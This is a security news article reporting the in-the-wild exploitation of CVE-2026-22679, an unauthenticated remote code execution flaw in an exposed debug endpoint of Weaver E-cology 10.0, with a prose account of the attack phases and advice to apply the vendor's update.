A critical Weaver E-cology flaw tied to CVE-2026-22679 was reportedly exploited in attacks starting mid-March, with fixes released shortly after.
A critical vulnerability in the Weaver E-cology office automation platform has been actively exploited in the wild since mid-March, allowing attackers to run commands on affected servers.
Misryoum reports that the issue. tracked as CVE-2026-22679. is an unauthenticated remote code execution (RCE) flaw impacting E-cology 10.0 builds released prior to March 12.. The bug stems from an exposed debug API endpoint that can accept user-controlled parameters and route them into backend functionality without proper authentication or safeguards. effectively turning that endpoint into a remote command execution interface.
In this context. the timing is especially worrying: attacks are said to have begun only about five days after a security update was released by the vendor. yet roughly two weeks before the vulnerability details were publicly disclosed.. According to Misryoum, researchers documented activity spanning around a week and described it as unfolding in multiple distinct phases.
Weaver E-cology is an enterprise office automation and collaboration suite used for workflows. document management. HR. and other internal business processes. with adoption reported primarily among Chinese organizations.. The attackers’ early steps reportedly focused on confirming RCE behavior by triggering test commands through a Java-linked callback. before attempting payload delivery through PowerShell-based approaches.. Some attempts were blocked by endpoint defenses, and at least one installer-based approach reportedly failed to execute as intended.
After those setbacks. the activity reportedly shifted back toward the vulnerable endpoint. with Misryoum noting the use of obfuscated and fileless PowerShell to repeatedly retrieve remote scripts.. Across the observed phases. attackers also carried out reconnaissance. including commands commonly used to identify the current user and host configuration and to list running processes.
Insight: Even when attackers cannot fully complete their payload chain, an RCE path can still be enough to support reconnaissance and probing, which often sets the stage for later, more damaging intrusions.
A key detail highlighted in Misryoum’s reporting is that the malicious operations did not establish a persistent session on targeted hosts. In addition, the vendor’s fix for the problem reportedly removes the exposed debug endpoint entirely, with updated builds referenced as addressing the issue.
Misryoum says there are no alternative mitigations or workarounds outlined in the official guidance, leaving system upgrades as the primary recommendation. Organizations running the affected E-cology 10.0 builds should apply the available security updates as soon as possible.
Insight: For defenders, this case is a reminder that even “debug” functionality can become a high-risk attack surface if it is reachable without authentication and lacks strict input handling.